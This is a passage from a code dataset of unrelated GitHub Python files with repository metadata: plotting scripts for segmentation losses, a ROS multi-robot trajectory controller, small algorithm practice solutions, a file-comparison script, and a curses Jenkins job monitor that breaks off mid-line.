axs[i].set_xlabel(lf[i])\n axs[i].margins(x=0)\n axs[i].set_yticks(np.arange(0,1.1,0.1))\n axs[i].grid(True)\n \n if i > 0: \n axs[i].set(yticklabels=([])) # remove the yticks for all plots except 1st one\n\n plt.legend()\n\n plt.savefig(\"figures/ResultsPerformanceComparison.svg\")\n #plt.show() \n\nclass FigLossShaping():\n # Plots the function on construction call\n def __init__(self): \n fig = plt.figure(dpi=400)\n \n # Plot the two fuunctions \n x = np.linspace(-0.1, 1.5, 1000) # X-values for the plot\n plt.plot(x, self.f_lossShaping(x), color=\"red\", label=\"Loss Shaping Function\")\n plt.plot(x, self.f_LIoU(x), color=\"blue\", label= \"1 − IoU\")\n plt.grid()\n plt.xticks(np.arange(0,1.1,0.1))\n plt.xlim(-0.05,1.05)\n plt.ylim(-0.05,1.3)\n plt.legend()\n # plt.tight_layout()\n ax = fig.get_axes()[0]\n ax.set_xlabel(\"Class IoU Score\")\n ax.set_ylabel(\"Class Generated Error\")\n ax.margins(x=0,y=0)\n\n\n plt.savefig(\"figures/LossShapingFunction.svg\")\n #plt.show()\n\n def f_lossShaping(self, x): # Loss shaping function base implementation \n return -np.log10(pow(x,0.5))\n def f_LIoU(self, x):# IoU-loss base implementation\n return 1-x \n\nclass FigPowerTerm(): \n def __init__(self): \n fig = plt.figure(dpi=400)\n x = np.linspace(-0.1,1.5,1000)\n plt.plot(x, self.f_powerJaccard(x), color=\"red\", label=\"Power Term\")\n plt.plot(x, self.f_IoU(x), color=\"blue\", label=\"IoU\")\n plt.grid()\n plt.xticks(np.arange(0,1.1,0.1))\n plt.xlim(-0.05,1.05)\n plt.ylim(-0.05,1.05)\n plt.legend()\n # plt.tight_layout()\n ax = fig.get_axes()[0]\n ax.set_xlabel(\"Pixel Prediction Probability\")\n ax.set_ylabel(\"Generated Score\")\n\n\n\n plt.savefig(\"figures/PowerTermFunction.svg\")\n #plt.show()\n \n def f_powerJaccard(self, x): \n return x/(pow(x,2) + 1 - x)\n \n def f_IoU(self, x): \n return x/(x + 1 - x) # IoU score (same as 1/x)\n\nclass FigDBDistribution(): \n def __init__(self, fpath=\"\", class_labels={}, ignore=[], colors=None): \n \n with open (\"figures/distributions.csv\", 'r') as file: \n csvreader = csv.reader(file)\n for i, row in enumerate(csvreader):\n\n if i == 1: \n class_labels = np.array(row)\n elif i == 2: \n distribution = np.array(row)\n # Format the csv values into an array of floats\n distribution = np.char.strip(distribution)\n distribution.astype(\"float\")\n\n # Convert the csv file and prep the data\n df = pd.DataFrame({\"class_labels\": class_labels, \"distribution\": distribution, \"colors\": colors})\n df = df.astype({\"class_labels\": \"string\", \"distribution\": \"float\"})\n df = df.sort_values(by=\"distribution\", ascending=False) # sort the values based on size\n df_lower = df[6:] # Get the lowest values to display them on a separate plot\n\n plt.rcParams.update({\"font.size\":11.5})\n # Plot the figure \n fig, main = plt.subplots(dpi=400)\n plt.xticks(rotation=75)\n \n fig.set_figheight(6)\n fig.set_figwidth(10)\n # Add the subplot axes \n sub = fig.add_axes([0.35,0.3, 0.6, 0.6])\n plt.xticks(rotation=75)\n \n if colors == None: \n main.bar(df[\"class_labels\"], df[\"distribution\"])\n sub.bar(df_lower[\"class_labels\"], df_lower[\"distribution\"])\n else: \n # Normalize the range to fit requirements for plotting\n df.colors = np.asarray(df.colors)\n for i,color in enumerate(df.colors): \n df[\"colors\"][i] = np.divide(df[\"colors\"][i], 255.0)\n df.colors[i] = np.around(df.colors[i],2)\n\n # Plot the main plot and subplot \n main.bar(df[\"class_labels\"], df[\"distribution\"], color=df.colors)\n sub.bar(df_lower[\"class_labels\"], df_lower[\"distribution\"], color=df.colors[6:])\n\n # Figure formatting\n main.margins(x=0)\n sub.margins(x=0)\n main.set_ylabel(\"Number of Pixels\")\n plt.tight_layout()\n\n # Update formatting to use literature scientific notation\n f = mticker.ScalarFormatter(useOffset=False, useMathText=True)\n sub.yaxis.set_major_formatter(f)\n main.yaxis.set_major_formatter(f)\n\n plt.savefig(\"figures/rellis3dDistribution.svg\")\n # plt.show() # display the results\n\n\nclass QualitativeResults(): \n \"\"\"\n QualitativeResults()\\n\n --------------------------------------\\n\n A single image is being displayed alongside all the other segmentation predictions obtained for all loss functions. \\n\n Used to qualitatively represent the performance of each loss functions \\n\n \"\"\"\n def __init__(self): \n from matplotlib.figure import SubplotParams\n\n fig, axs = plt.subplots(2,6, tight_layout=True, dpi=400)\n fig.set_figheight(4)\n fig.set_figwidth(16)\n #Save description to make overall formatting a lot easier \n desc = {\n \"base_img\": \"Base Image\",\n \"ann\": \"Ground-Truth Annotations\",\n \"014\": \"FCIoUV2\",\n \"018\": \"Cross Entropy Loss\",\n \"019\": \"Jaccard (IoU) Loss\",\n \"020\": \"Dice Loss\",\n \"021\": \"Focal Loss\",\n \"023\": \"DiceFocal\",\n \"025\": \"FCIoUV1\",\n \"026\": \"Tversky Loss\",\n \"032\": \"Power Jaccard\",\n \"033\": \"DiceTopk\", \n }\n \n desc_names = list(desc.keys())\n lfnames = list(desc.values())\n i = 0\n for r, _ in enumerate(axs): \n for c, _ in enumerate(axs[r]):\n axs[r,c].imshow(Image.open(\"figures/QualitativeResults/{}.png\".format(desc_names[i])))\n axs[r,c].set_xlabel(lfnames[i])\n # Remove xticks and yticks alltogether \n axs[r,c].set_xticks([])\n axs[r,c].set_yticks([])\n axs[r,c].margins(x = 0,y = 0)\n\n i += 1 # increment the counter\n \n # Update the subplot format\n fig.subplots_adjust(wspace=0, hspace=0)\n plt.savefig(\"figures/QualitativeResults.svg\", dpi=400)\n #plt.show()\n pass\n\nclass FigPredictionCertainty(): \n def __init__(self, pred, pred_map, ann, class_labels=[], color_map = None): \n # Remove the batching wrapper -> only use one of the image (if >1 present)\n pred = pred[0].cpu()\n ann = ann[0]\n\n # Convert the labels into a list\n class_labels = list(class_labels.values())\n class_labels = class_labels[1:] # remove the void class since it is the same as the dirt class\n\n # Configure the n# of rows and cols in the figure\n rows, cols = 4, 5\n fig = plt.figure(tight_layout = True, dpi = 300) # TODO -> Update to create a slot for each class.\n gs = fig.add_gridspec(nrows=rows, ncols=cols, wspace= 0.00, hspace = 0.4)\n\n # # place the annotation map on the figure. \n # if color_map is None: \n # annotation map image\n ax = fig.add_subplot(gs[0,0])\n ax.imshow(ann.cpu(), cmap=\"gray\")\n ax.set_xticks([])\n ax.set_yticks([]) \n ax.set_xlabel(\"Ann Map\", fontsize = \"xx-small\", va=\"top\") \n # Prediction output map\n ax = fig.add_subplot(gs[0,1])\n ax.imshow(pred_map.cpu()[0], cmap=\"gray\")\n ax.set_xticks([])\n ax.set_yticks([]) \n ax.set_xlabel(\"Pred Map\", fontsize = \"xx-small\", va=\"top\") \n\n\n i = 0\n for row in range(rows): \n for col in range(cols):\n\n # Start on the 2nd plot for the first cycle only\n if col < 2 and row == 0: \n col = col + 1 \n else: # ONly complete in the next slots\n ax = fig.add_subplot(gs[row,col]) # add the new subplot to the figure\n\n # r,g,b = self.__conv_color_map(color_map[i]) # rgb colours\n # cdict ={\n # 'red':((0,1,r), (1,r,r)),\n # 'green':((0,1,g), (1,g,g)),\n # 'blue':((0,b,b), (1,b,b)),\n # }\n # cmap = LinearSegmentedColormap(class_labels[i], cdict, N = 256)\n\n ax.imshow(1 - pred[i], cmap = \"gray\")\n ax.set_xticks([])\n ax.set_yticks([])\n ax.set_xlabel(\"{}: {}\".format(i, class_labels[i]), fontsize = \"xx-small\", va=\"top\") # Add labels for each class\n ax.margins(x = 0)\n\n\n i = i + 1 # increase the index for pred\n if i > 18: \n break\n\n\n ax = plt.gca()\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n \n # # Create a figure for each class \n # for c in pred:\n \n plt.show()\n\n def __dispfunc(self, pred): \n \"\"\"This function is applied to the logit output prediction from the model to display the desired output \n The function will depend on which relationship we want to investigate in the figure. \n\n :param pred: Prediction (logit) output from the model\n :type pred: torch.tensor\n :return: Updated tensor for desired format\n :rtype: torch.tensor\n \"\"\" \n return 1 - pred\n\n def __conv_color_map(self,color): \n return (color[0]/255.0, color[1]/255.0, color[2]/255.0)\n\nif __name__ == \"__main__\": \n\n # FigLossShaping()\n # FigPowerTerm()\n\n class_labels = {\n 0: \"void\",\n 1: \"dirt\",\n 2: \"grass\",\n 3: \"tree\",\n 4: \"pole\",\n 5: \"water\",\n 6: \"sky\",\n 7: \"vehicle\",\n 8: \"object\",\n 9: \"asphalt\",\n 10: \"building\",\n 11: \"log\",\n 12: \"person\",\n 13: \"fence\",\n 14: \"bush\",\n 15: \"concrete\",\n 16: \"barrier\",\n 17: \"puddle\",\n 18: \"mud\",\n 19: \"rubble\",\n }\n\n # # Add to path to allow access to the dataloader\n import sys\n import os\n sys.path.append(os.getcwd())\n import dataloader \n db = dataloader.DataLoader()\n colors = db.get_colors(remap_labels=True)\n\n\n # FigResults()\n # FigLossShaping()\n # FigPowerTerm()\n FigDBDistribution(fpath=\"figures/distributions.csv\", class_labels=class_labels, ignore=[0,1], colors=colors[1:])\n # QualitativeResults()\n","repo_name":"jonathanplangger/VBTC","sub_path":"figures/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":14000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42817291281","text":"#! /usr/bin/env python3\n\nimport rospy\nimport tf\nfrom tf import transformations\nfrom mypath import MyTrajectory\nfrom nav_msgs.msg import Path\nimport math\nfrom geometry_msgs.msg import Twist, PoseWithCovarianceStamped, Pose\nfrom cartesian_controller import cartesian_controller\nfrom sensor_msgs.msg import JointState\nfrom nav_msgs.msg import Odometry\nfrom match_lib.match_robots import MirNav2Goal\n\n\n\nclass execute_trajectories_node():\n\n def __init__(self):\n rospy.init_node(\"lyapunov_controller_node\")\n rospy.loginfo(\"lyapunov controller running\")\n rospy.set_param(\"/mir_initialized\",False)\n self.config()\n \n\n\n\n\n def run(self):\n rospy.loginfo(f\"waiting for trajecories{len(self.target_trajectories)}\")\n while len(self.target_trajectories) != self.number_of_robots and not rospy.is_shutdown():\n rospy.sleep(0.1)\n \n rospy.loginfo(\"all trajecories received\")\n rate = rospy.Rate(self.control_rate)\n idx = 0\n\n # Move to initial pose\n # Because first goal of trajectory is not reached by cartesain formation controller\n mir=MirNav2Goal(\"/mur216\")\n first_pose = Pose()\n first_pose.position.x = self.target_trajectories[0].x[0]\n first_pose.position.y = self.target_trajectories[0].y[0]\n first_pose.orientation.w = 1.0\n mir.sendGoalPos(first_pose)\n while not rospy.is_shutdown():\n res = mir.is_ready()\n if res:\n break\n rospy.sleep(0.5)\n rospy.logdebug(\"MiR at goal\")\n\n # Move to initial pose Via formation controller\n for index in range(0,1): # warum?\n \n # Turn towards the initial pose\n rospy.loginfo(\"turning towards initial pose\")\n correct_orientation = 0\n while not rospy.is_shutdown() and (correct_orientation < self.number_of_robots):\n for i in range(0,self.number_of_robots):\n act_pose = self.robot_poses[i]\n set_pose_x = self.target_trajectories[i].x[0]\n set_pose_y = self.target_trajectories[i].y[0]\n phi_actual = transformations.euler_from_quaternion([act_pose.orientation.x,act_pose.orientation.y,act_pose.orientation.z,act_pose.orientation.w])\n phi_target = math.atan2(set_pose_y-act_pose.position.y,set_pose_x-act_pose.position.x)\n e_phi = phi_target - phi_actual[2]\n \n\n if e_phi > math.pi:\n e_phi = e_phi - 2*math.pi\n elif e_phi < -math.pi:\n e_phi = e_phi + 2*math.pi\n self.robot_command.angular.z = self.K_phi * e_phi\n if abs(self.robot_command.angular.z) > self.limit_w:\n self.robot_command.angular.z = self.robot_command.angular.z / abs(self.robot_command.angular.z) * self.limit_w\n if abs(e_phi) < self.target_threshhold_angular:\n self.robot_command.angular.z = 0\n correct_orientation += 1\n self.cmd_vel_publishers[i].publish(self.robot_command)\n\n rate.sleep()\n\n # move linear to the initial pose\n rospy.loginfo(\"moving to initial pose\")\n correct_distance = 0\n while not rospy.is_shutdown() and correct_distance < self.number_of_robots:\n for i in range(0,self.number_of_robots):\n act_pose = self.robot_poses[i]\n set_pose_x = self.target_trajectories[i].x[0]\n set_pose_y = self.target_trajectories[i].y[0]\n e_d = math.sqrt((set_pose_x-act_pose.position.x)**2 + (set_pose_y-act_pose.position.y) **2 )\n\n self.robot_command.linear.x = self.K_d * e_d\n if abs(self.robot_command.linear.x) > self.limit_x:\n self.robot_command.linear.x = self.robot_command.linear.x / abs(self.robot_command.linear.x) * self.limit_x\n if abs(e_d) < self.target_threshhold_linear: # TODO: dangerous if localization is not good\n self.robot_command.linear.x = 0\n correct_distance += 1\n self.cmd_vel_publishers[i].publish(self.robot_command)\n\n rate.sleep()\n\n self.target_threshhold_angular *= 0.5\n self.target_threshhold_linear *= 0.5\n \n # set correct orientation\n rospy.loginfo(\"setting correct orientation\")\n correct_orientation = 0\n while not rospy.is_shutdown() and correct_orientation < self.number_of_robots:\n for i in range(0,self.number_of_robots) :\n act_pose = self.robot_poses[i]\n phi_actual = transformations.euler_from_quaternion([act_pose.orientation.x,act_pose.orientation.y,act_pose.orientation.z,act_pose.orientation.w])\n phi_target = self.target_trajectories[i].phi[0]\n e_phi = phi_target - phi_actual[2]\n if e_phi > math.pi:\n e_phi = e_phi - 2*math.pi\n elif e_phi < -math.pi:\n e_phi = e_phi + 2*math.pi\n self.robot_command.angular.z = self.K_phi * e_phi\n if abs(self.robot_command.angular.z) > self.limit_w:\n self.robot_command.angular.z = self.robot_command.angular.z / abs(self.robot_command.angular.z) * self.limit_w\n if abs(e_phi) < self.target_threshhold_angular:\n self.robot_command.angular.z = 0\n correct_orientation += 1\n self.cmd_vel_publishers[i].publish(self.robot_command)\n \n #rospy.logdebug(e_phi)\n\n rospy.set_param(\"/mir_initialized\",True)\n rospy.loginfo(\"MiR initialized\")\n\n ### wait for UR to continue ###\n ur_request = False\n rate = rospy.Rate(1)\n while not rospy.is_shutdown() and ur_request == False:\n ur_request = rospy.get_param(\"/ur_initialized\", False)\n if ur_request == True:\n rospy.loginfo(\"UR initialized\")\n else: \n #rospy.loginfo(\"Waiting for UR to be initialized...\")\n pass\n rate.sleep()\n \n \n #### Main loop ##### \n rate = rospy.Rate(self.control_rate)\n \n while not rospy.is_shutdown() and idx < len(self.target_trajectories[0].v):\n w_filtered = 0.0\n v_filtered = 0.0\n for i in range(0,self.number_of_robots):\n act_pose = self.robot_poses[i]\n set_pose_x = self.target_trajectories[i].x[idx]\n set_pose_y = self.target_trajectories[i].y[idx]\n set_pose_phi = self.target_trajectories[i].phi[idx]\n w_target = self.target_trajectories[i].w[idx] * self.control_rate\n v_target = self.target_trajectories[i].v[idx] * self.control_rate\n v_filtered = v_filtered * (1-self.filter_const_vel) + v_target * self.filter_const_vel\n w_filtered = w_filtered * (1-self.filter_const) + w_target * self.filter_const \n u_v, u_w = cartesian_controller(act_pose,set_pose_x,set_pose_y,w_filtered,v_target,set_pose_phi)\n\n self.robot_command.linear.x = u_v\n self.robot_command.angular.z = u_w\n self.cmd_vel_publishers[i].publish(self.robot_command)\n self.target_pose_broadcaster([set_pose_x,set_pose_y,set_pose_phi],i)\n self.actual_pose_broadcaster(act_pose,i)\n\n idx += 1\n rate.sleep()\n\n def trajectory_cb(self,Path,robot_index):\n trajectory = MyTrajectory()\n trajectory.x = []\n trajectory.y = []\n trajectory.phi = []\n path_len = len(Path.poses)\n for i in range(0,path_len-1):\n trajectory.x.append(Path.poses[i].pose.position.x)\n trajectory.y.append(Path.poses[i].pose.position.y)\n phi = math.atan2(Path.poses[i+1].pose.position.y-Path.poses[i].pose.position.y,Path.poses[i+1].pose.position.x-Path.poses[i].pose.position.x)\n trajectory.phi.append(phi)\n \n trajectory.v = [0.0]\n trajectory.w = [0.0]\n for i in range(1,path_len-2):\n trajectory.v.append(math.sqrt((trajectory.x[i+1]-trajectory.x[i])**2 + (trajectory.y[i+1]-trajectory.y[i])**2 ))\n trajectory.w.append(trajectory.phi[i+1]-trajectory.phi[i])\n\n self.target_trajectories.append(trajectory)\n\n\n def robot_pose_cb(self,msg=PoseWithCovarianceStamped(),robot_index=0):\n self.robot_poses[robot_index] = msg.pose.pose\n\n\n def target_pose_broadcaster(self,target_pose,robot_id):\n frame_id = \"robot\" + str(robot_id) + \"/target_pose\"\n self.pose_broadcaster.sendTransform((target_pose[0], target_pose[1], 0),\n tf.transformations.quaternion_from_euler(0, 0, target_pose[2]),\n rospy.Time.now(), frame_id, \"map\")\n\n def actual_pose_broadcaster(self,actual_pose,robot_id):\n frame_id = \"robot\" + str(robot_id) + \"/actual_pose\"\n self.pose_broadcaster.sendTransform((actual_pose.position.x, actual_pose.position.y, 0),\n (actual_pose.orientation.x,actual_pose.orientation.y,actual_pose.orientation.z,actual_pose.orientation.w),\n rospy.Time.now(), frame_id, \"map\")\n \n def joint_states_cb(self, data):\n self.ur_base_angle = data.position[2]\n\n def config(self):\n rospy.Subscriber(\"joint_states\", JointState, self.joint_states_cb)\n self.number_of_robots = rospy.get_param(\"~number_of_robots\")\n self.control_rate = rospy.get_param(\"~control_rate\")\n self.target_trajectories = []\n self.robot_poses = []\n self.cmd_vel_publishers = []\n self.robot_command = Twist()\n self.pose_broadcaster = tf.TransformBroadcaster()\n self.K_phi = 0.6\n self.K_d = 0.7\n self.limit_w = 0.3\n self.limit_x = 0.1\n self.target_threshhold_angular = 0.06\n self.target_threshhold_linear = 0.15\n self.filter_const = 0.1\n self.filter_const_vel = 1.0\n self.multiplicator = 1.0\n\n for i in range(0,self.number_of_robots):\n param = \"~robot\" + str(i) + \"_trajectory_topic\"\n robotX_trajectory_topic = rospy.get_param(param)\n rospy.Subscriber(robotX_trajectory_topic, Path, self.trajectory_cb, i)\n\n param = \"~robot\" + str(i) + \"_pose_topic\"\n robotX_pose_topic = rospy.get_param(param)\n self.robot_poses.append(Pose())\n rospy.Subscriber(robotX_pose_topic, Odometry, self.robot_pose_cb, i)\n\n param = \"~robot\" + str(i) + \"_cmd_vel_topic\"\n topic = rospy.get_param(param)\n self.cmd_vel_publishers.append(rospy.Publisher(topic,Twist,queue_size=5))\n\n \n\n\n\nif __name__==\"__main__\":\n exe = execute_trajectories_node()\n exe.run()\n","repo_name":"pumablattlaus/mur_sb","sub_path":"control/formation_controller/execute_trajectories_dynamic.py","file_name":"execute_trajectories_dynamic.py","file_ext":"py","file_size_in_byte":11349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70470788054","text":"'''\n#bisect 이용\nimport sys\nimport bisect\ninput = sys.stdin.readline\nn, x = map(int,input().split())\nnumbers = list(map(int,input().split()))\nleft = bisect.bisect_left(numbers,x)\nright = bisect.bisect_right(numbers,x)\nresult = right - left\nif result:\n print(result)\nelse:\n print(-1)\n'''\nimport sys\ninput = sys.stdin.readline\nn, x = map(int,input().split())\nnumbers = list(map(int,input().split()))\ndef first(array, target, start, end):\n if start > end:\n return None\n mid = (start + end) // 2\n if (mid == 0 or target > array[mid - 1]) and array[mid] == target:\n return mid\n elif target <= array[mid]:\n return first(array, target, start, mid - 1)\n elif target > array[mid]:\n return first(array, target, mid + 1, end)\n\ndef last(array, target, start, end):\n if start > end:\n return None\n mid = (start + end) // 2\n if (mid == n - 1 or target < array[mid + 1]) and array[mid] == target:\n return mid\n elif target >= array[mid]:\n return last(array, target, mid + 1, end)\n elif target < array[mid]:\n return last(array, target, start, mid - 1)\na = first(numbers, x, 0, n-1)\nb = last(numbers, x, 0, n-1)\nif not a :\n print(-1)\nelse:\n print(b - a +1)","repo_name":"engks4619/CodingTestPractice","sub_path":"이것이 코딩 테스트다/유형별 기출문제/이진탐색_정렬된 배열에서 특정 수의 개수 구하기.py","file_name":"이진탐색_정렬된 배열에서 특정 수의 개수 구하기.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20619631861","text":"class ConferePGM:\n\n def carrega(self, path):\n _entrada = open(path, \"rt\")\n dados = _entrada.read().splitlines()\n return dados\n _entrada.close()\n\n def comparaLista(self, lista1, lista2):\n for dado in lista2:\n if dado[26:36] in lista1:\n print(dado)\n\ndef main():\n\n confere = ConferePGM()\n lista_pagos = confere.carrega(\"pagosPGM_distribuidorMai2018.txt\")\n lista_problema = confere.carrega(\"07.txt\")\n confere.comparaLista(lista_pagos, lista_problema)\n\nif __name__ == \"__main__\":\n main()","repo_name":"alanprot7/PythonCartorio","sub_path":"confere_pgm_pg.py","file_name":"confere_pgm_pg.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"750344908","text":"# 1476 날짜계산\r\n# 3년 전에 C++로 풀었던 문제\r\n\r\nE, S, M = map(int, input().split())\r\n\r\nresult = 0\r\nyear = 1\r\n\r\nwhile True:\r\n if (year-E) % 15 == 0 and (year-S) % 28 == 0 and (year-M) % 19 == 0:\r\n result = year\r\n break\r\n else:\r\n year+=1\r\n\r\nprint(year)","repo_name":"rootachieve/Algorithm-study","sub_path":"week16/@HyeonDKIM/1476.py","file_name":"1476.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"37057586948","text":"#! /usr/bin/env python\n\n# Jenkins monitor in terminal based on the curses library\n# Author: Marius Herring\n\nimport curses\nimport base64\nimport sys\nimport time\nimport traceback\nimport argparse\n\nif (sys.version_info > (3,0)):\n\tfrom urllib.request import urlopen\n\tfrom urllib.request import Request\nelse:\n\tfrom urllib2 import urlopen\n\tfrom urllib2 import Request\n\ndef createHeader():\n\n\theader = \"Curses Jenkins\"\n\theaderPos = (x/2) - 7\n\n\tif (sys.version_info > (3,0)):\n\t\theaderPos = round(headerPos)\n\n\n\tmyscreen.addstr(0, headerPos, header,curses.color_pair(1))\n\ndef noticeInteractiveMode(focusRow):\n\n\twidth = x-2\n\tif (sys.version_info > (3,0)):\n\t\twidth = round(width)\n\n\tif focusRow == -1:\n\t\tmyscreen.addstr(1, 1, \" \" * width, curses.color_pair(1))\n\telse:\n\t\theaderPos = (x/2) - 8\n\t\tif (sys.version_info > (3,0)):\n\t\t\theaderPos = round(headerPos)\n\n\t\tmyscreen.addstr(1, 1, \" \" * width, curses.color_pair(7))\n\t\tmyscreen.addstr(1, headerPos, \"Interactive mode\",curses.color_pair(7))\n\n\ndef init():\n\n\tglobal myscreen, x, y, links\n\n\tparseArgs()\n\n\tmyscreen = curses.initscr()\n\tmyscreen.border(0)\n\tcurses.curs_set(0)\n\tcurses.noecho()\n\n\tlinks = {}\n\n\ty,x = myscreen.getmaxyx()\n\n\tdefineColors()\n\n\ndef parseArgs():\n\tglobal args\n\tparser = argparse.ArgumentParser(prog='CJenkins')\n\tparser.add_argument('-u', nargs='?', help='username')\n\tparser.add_argument('-p', nargs='?', help='password')\n\tparser.add_argument('-l', nargs='*', help='links', required=True)\n\targs = parser.parse_args()\n\ndef defineColors():\n\n\tcurses.start_color()\n\tcurses.init_pair(1, curses.COLOR_WHITE, curses.COLOR_BLACK)\n\tcurses.init_pair(2, curses.COLOR_GREEN, curses.COLOR_BLACK)\n\tcurses.init_pair(3, curses.COLOR_MAGENTA, curses.COLOR_BLACK)\n\tcurses.init_pair(4, curses.COLOR_CYAN, curses.COLOR_BLACK)\n\tcurses.init_pair(5, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\tcurses.init_pair(6, curses.COLOR_RED, curses.COLOR_BLACK)\n\tcurses.init_pair(7, curses.COLOR_BLACK, curses.COLOR_RED)\n\tcurses.init_pair(8, curses.COLOR_BLACK, curses.COLOR_WHITE)\n\n\tcurses.init_pair(11, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(12, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(13, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(14, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(15, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\tcurses.init_pair(16, curses.COLOR_BLACK, curses.COLOR_CYAN)\n\ndef displayGui():\n\n\tcount = 1\n\n\ttry:\n\t\twhile 1:\n\n\t\t\tdrawScreen(count, -1)\n\n\t\t\tif count < 6:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tcount = 1\n\n\t\t\ttime.sleep(1)\n\n\texcept (SystemExit, Exception):\n\t\tcurses.endwin()\n\t\tprint(traceback.format_exc())\n\t\tsys.exit(0)\n\texcept (KeyboardInterrupt):\n\t\tinteractiveLoop()\n\ndef interactiveLoop():\n\n\ttry:\n\t\tfocusRow = 4\n\t\tmyscreen.nodelay(1)\n\t\tdrawScreen(1,focusRow)\n\t\twhile 1:\n\t\t\tc = myscreen.getch()\n\t\t\tif c == ord('w'):\n\t\t\t\tfocusRow = findPrevRowToFocus(focusRow)\n\t\t\t\tdrawScreen(1,focusRow)\n\t\t\tif c == ord('s'):\n\t\t\t\tfocusRow = findNextRowToFocus(focusRow)\n\t\t\t\tdrawScreen(1,focusRow)\n\t\t\tif c == ord('m'):\n\t\t\t\tswitchToMonitor()\n\t\t\tif c == ord('b') and args.u != None and args.p != None:\n\t\t\t\tbuild(focusRow)\n\t\t\t\tswitchToMonitor()\n\t\t\ttime.sleep(0.1)\n\n\texcept (Exception):\n\t\tcurses.endwin()\n\t\tprint(traceback.format_exc())\n\t\tsys.exit(0)\n\texcept (SystemExit, KeyboardInterrupt):\n\t\tcurses.endwin()\n\t\tsys.exit(0)\n\ndef switchToMonitor():\n\tdisplayGui()\n\ndef drawScreen(count, focusRow):\n\trow = 1\n\n\tcreateHeader()\n\tnoticeInteractiveMode(focusRow)\n\n\tfor link in args.l:\n\t\trow = readData(count, link, row, focusRow)\n\n\tmyscreen.refresh()\n\ndef readData(count, link, row, focusRow):\n\n\tdata = getJobs(link);\n\n\trow += 1\n\n\tif windowToSmallToWriteIn(row):\n\t\treturn row;\n\n\taddDescription(data[\"description\"], row);\n\trow += 2\n\n\tfor current in data[\"jobs\"]:\n\n\t\tif windowToSmallToWriteIn(row):\n\t\t\tbreak;\n\n\t\tnameToDisplay = current[\"name\"].strip()\n\t\tcolor = current[\"color\"].strip()\n\t\tcolorCode = getColorCode(color)\n\t\tcolorCode = adjustColor(colorCode, row, focusRow)\n\n\t\tlinks[row] = current[\"url\"]\n\n\t\tcleanLine(row, focusRow)\n\n\t\taddHealthReport(current, row, focusRow)\n\n\t\tmyscreen.addstr(row, 16, nameToDisplay, curses.color_pair(colorCode))\n\n\t\taddStructure(row, focusRow)\n\n\t\taddProgressBar(count, row, nameToDisplay, color, focusRow)\n\n\t\tcreateStatus(row, color, row, focusRow)\n\n\t\taddQuitInstructions(y, focusRow)\n\n\t\trow += 1\n\n\trow += 1;\n\treturn row\n\ndef addStructure(row, focusRow):\n\tmyscreen.addstr(row, 49, \"[\", curses.color_pair(adjustColor(1, row, focusRow)))\n\tmyscreen.addstr(row, 56, \"]\", curses.color_pair(adjustColor(1, row, focusRow)))\n\ndef cleanLine(row, focusRow):\n\tmyscreen.addstr(row, 1, \" \" * (x-2), curses.color_pair(adjustColor(1, row, focusRow)))\n\ndef addHealthReport(current, row, focusRow):\n\n\tif x > 119:\n\t\tmyscreen.addstr(row, 58, \" \" * (x-59), curses.color_pair(adjustColor(4, row, focusRow)))\n\t\tmyscreen.addstr(row, 58, current[\"healthReport\"][0][\"description\"], curses.color_pair(adjustColor(4, row, focusRow)))\n\ndef addDescription(description, row):\n\n\t# Set standard description if jenkins doesn't have any\n\tif description is None:\n\t\tdescription = \"Jenkins\"\n\n\t# We just allow 1 line of description\n\tdescription = description.split('\\n')[0]\n\n\t# If description is to long, cut of parts of the end\n\tif (x-2) < len(description):\n\t\tdescription = description[:(x-10)]\n\t\tdescription += \" (...)\"\n\n\tmyscreen.addstr(row, 2, description, curses.color_pair(1))\n\ndef addProgressBar(count, row, nameToDisplay, color, focusRow):\n\n\tif \"anime\" in color:\n\t\tprogressBar = createProgressBar(count);\n\t\tmyscreen.addstr(row, 50, progressBar, curses.color_pair(adjustColor(3, row, focusRow)))\n\telse:\n\t\tmyscreen.addstr(row, 50, \" \" * 6, curses.color_pair(adjustColor(3, row, focusRow)))\n\ndef createProgressBar(count):\n\n\tresult = \"|\" * count\n\tspace = \" \" * (6-count)\n\tresult = result+space\n\treturn result\n\ndef addQuitInstructions(y, focusRow):\n\tif focusRow == -1:\n\t\tmyscreen.addstr(y-2, 1, \" \" * (x-2), curses.color_pair(1))\n\t\tmyscreen.addstr(y-2, 2, \"Press ctrl+C to interact!\")\n\telse:\n\t\tmyscreen.addstr(y-2, 1, \" \" * (x-2), curses.color_pair(8))\n\n\t\tif args.u != None and args.p != None:\n\t\t\tmyscreen.addstr(y-2, 2, \"ctrl+C: quit | w: up | s: down | b: build | m: monitor\",curses.color_pair(8))\n\t\telse:\n\t\t\tmyscreen.addstr(y-2, 2, \"ctrl+C: quit | m: monitor | build: requires auth\",curses.color_pair(8))\n\ndef windowToSmallToWriteIn(row):\n\n\tif row >= (y-3):\n\t\tif x > 50:\n\t\t\tmyscreen.addstr(y-2, 23, \" (Can't show all data. To small window)\", curses.color_pair(6))\n\t\telse:\n\t\t\tmyscreen.addstr(y-3, 2, \"(Can't show all data. To small window)\", curses.color_pair(6))\n\t\treturn 1\n\n\treturn 0\n\ndef createStatus(y, color, row, focusRow):\n\n\tif \"blue\" in color:\n\t\tmyscreen.addstr(y, 2, \" [ OK ]\", curses.color_pair(adjustColor(2, row, focusRow)))\n\telif \"disabled\" in color:\n\t\tmyscreen.addstr(y, 2, \"[ DISABLED ]\", curses.color_pair(adjustColor(4, row, 